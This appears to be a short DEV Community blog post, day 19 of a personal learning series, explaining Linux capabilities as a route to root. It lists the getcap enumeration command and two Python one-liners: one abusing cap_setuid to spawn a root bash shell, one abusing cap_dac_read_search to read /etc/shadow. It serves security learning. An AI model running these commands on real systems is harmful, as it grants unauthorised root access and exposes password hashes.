DEV Community

Devon Argent
Devon Argent

Posted on

Day 19: Linux Capabilities β€” The "Silent" Path to Root πŸ•΅οΈβ€β™‚οΈ

#cybersecurity #linux #security #tutorial

πŸ” The Auditor's Command: getcap

To find these hidden permissions, I used:

getcap -r / 2>/dev/null
Enter fullscreen mode Exit fullscreen mode

πŸ”“ The Dangerous Duo: Exploiting Capabilities

1. cap_setuid (The King of Capabilities)

If a binary like Python has this capability, it can change its User ID (UID) to 0 (Root).
The Exploit:
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

2. cap_dac_read_search (The Data Thief)

This capability allows a program to bypass "Data Access Control" (DAC) to read any file on the system, regardless of its owner.
The Exploit:
python3 -c 'print(open("/etc/shadow").read())'

Follow my journey: #1HourADayJourney

Top comments (0)